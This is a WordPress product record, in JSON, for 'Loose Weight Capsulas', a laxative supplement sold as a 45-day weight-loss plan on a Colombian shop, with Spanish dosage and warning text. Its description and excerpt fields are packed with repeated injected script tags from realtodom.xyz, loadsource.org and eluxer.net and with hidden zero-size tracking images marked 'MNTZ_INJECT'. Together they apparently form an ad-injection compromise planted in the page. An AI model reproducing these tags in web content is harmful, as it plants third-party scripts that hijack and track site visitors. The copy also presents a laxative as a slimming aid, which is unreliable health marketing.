{"id":672,"date":"2018-07-27T16:44:47","date_gmt":"2018-07-27T16:44:47","guid":{"rendered":"http:\/\/healthandpower.com.co\/?product=loose-weight-3"},"modified":"2018-09-03T19:33:03","modified_gmt":"2018-09-03T19:33:03","slug":"loose-weight-3","status":"publish","type":"product","link":"http:\/\/healthandpower.com.co\/?product=loose-weight-3","title":{"rendered":"Loose Weight Capsulas"},"content":{"rendered":"<p><strong>PUEDE AYUDARLE A*:\u00a0<\/strong>Como una ayuda para inducir movimientos intestinales naturales.<\/p>\n<p style=\"text-align: left;\"><strong>INDICACIONES:\u00a0<\/strong>Adultos &#8211; tomar de una (1) a tres (3) c\u00e1psulas con abundante agua.<\/p>\n<p style=\"text-align: left;\"><strong>ADVERTENCIA:<\/strong>Este producto contiene ingredientes que brindan propiedades laxantes,<strong>\u00a0<\/strong>No debe ser utilizado por personas menores de 18 a\u00f1os. Este producto no debe ser tomado por mujeres embarazadas o lactantes. Si est\u00e1 tomando medicamentos o tiene una condici\u00f3n m\u00e9dica, consulte a un m\u00e9dico antes del uso.\u00a0Este producto no debe tomarse en conjunci\u00f3n con otros medicamentos destinados a ayudar en la eliminaci\u00f3n del intestino. Deje de usar y consulte a su m\u00e9dico si se produce alguna reacci\u00f3n adversa.<\/p>\n<p style=\"text-align: left;\"><strong>IMPORTANTE:<\/strong> Almacene bien cerrado en un lugar seco a temperatura ambiente controlada de 59 \u00b0 &#8211; 86 \u00b0 F.<\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/healthandpower.com.co\/wp-content\/uploads\/2018\/07\/loose.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-676\" src=\"http:\/\/healthandpower.com.co\/wp-content\/uploads\/2018\/07\/loose.jpg\" alt=\"loose\" width=\"367\" height=\"365\" srcset=\"http:\/\/healthandpower.com.co\/wp-content\/uploads\/2018\/07\/loose.jpg 367w, http:\/\/healthandpower.com.co\/wp-content\/uploads\/2018\/07\/loose-100x100.jpg 100w, http:\/\/healthandpower.com.co\/wp-content\/uploads\/2018\/07\/loose-150x150.jpg 150w, http:\/\/healthandpower.com.co\/wp-content\/uploads\/2018\/07\/loose-300x298.jpg 300w, http:\/\/healthandpower.com.co\/wp-content\/uploads\/2018\/07\/loose-180x180.jpg 180w, http:\/\/healthandpower.com.co\/wp-content\/uploads\/2018\/07\/loose-46x46.jpg 46w\" sizes=\"auto, (max-width: 367px) 100vw, 367px\" \/><\/a><\/p>\n<p style=\"text-align: left;\">Otros ingredientes: gelatina, harina (trigo) y estearato de magnesio.<\/p>\n<p>* Estas declaraciones no han sido evaluadas por la Administraci\u00f3n de Drogas y Alimentos. Este producto no est\u00e1 destinado a diagnosticar, tratar, curar o prevenir ninguna enfermedad.<\/p>\n<p><strong>NO UTILIZAR SI EL SELLO DE SEGURIDAD EST\u00c1 ROTO O FALTA.\u00a0<\/strong><strong>MANTENER FUERA DEL ALCANCE DE LOS NI\u00d1OS.<\/strong><\/p>\n<p>Distributed by National Board of Natural Medicine And Nutrition Inc, NJ Made In U.S.A. R.01100516983.<\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=OPTOUT_RESPONSE_OK&amp;t=1532644353140\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lat?jsonp=__twb_cb_472138674&amp;key=1b378c47aa1d605558&amp;cv=1532644351&amp;t=1532644353140\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lt?jsonp=__twb_cb_919163035&amp;key=1b378c47aa1d605558&amp;cv=64430&amp;t=1532644353141\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=cd1d2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532644353143\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=90f06&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532644353145\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=6a131&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532644353147\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=865b2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532644353149\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=90f06&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1532644354338\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=865b2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1532644354466\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=cd1d2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1532644357146\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=6a131&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1532644357220\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<h1><span style=\"color: #00ccff;\">$88.000<\/span><\/h1>\n<p>Plan 45 dias. rebaja peso y talla, armoniza tu figura<\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=19\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=32\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532633882516\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532634504257\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532634747990\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532634777233\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532635757475\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532638862654\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532639066947\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532639268645\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532639432289\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=OPTOUT_RESPONSE_OK&amp;t=1532644355040\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lat?jsonp=__twb_cb_847942401&amp;key=1b378c47aa1d605558&amp;cv=1532644352&amp;t=1532644355040\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/optout\/set\/lt?jsonp=__twb_cb_888185574&amp;key=1b378c47aa1d605558&amp;cv=64431&amp;t=1532644355041\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=cd1d2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532644355042\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=90f06&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532644355043\" alt=\"\" \/><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532644355043\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=6a131&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532644355044\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=865b2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_INJECT&amp;t=1532644355047\" alt=\"\" \/><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=865b2&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1532644355812\" alt=\"\" \/><img decoding=\"async\" style=\"width: 0; height: 0; display: none; visibility: hidden;\" src=\"http:\/\/realtodom.xyz\/metric\/?mid=90f06&amp;wid=51824&amp;sid=&amp;tid=6967&amp;rid=MNTZ_LOADED&amp;t=1532644355824\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532644504362\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532648451600\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=1532709924096\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":1245,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_brand":[],"product_cat":[54],"product_tag":[],"class_list":{"0":"post-672","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-digestion","8":"first","9":"instock","10":"shipping-taxable","11":"purchasable","12":"product-type-simple"},"_links":{"self":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/product\/672","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=672"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/media\/1245"}],"wp:attachment":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=672"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_brand&post=672"},{"taxonomy":"product_cat","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=672"},{"taxonomy":"product_tag","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=672"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}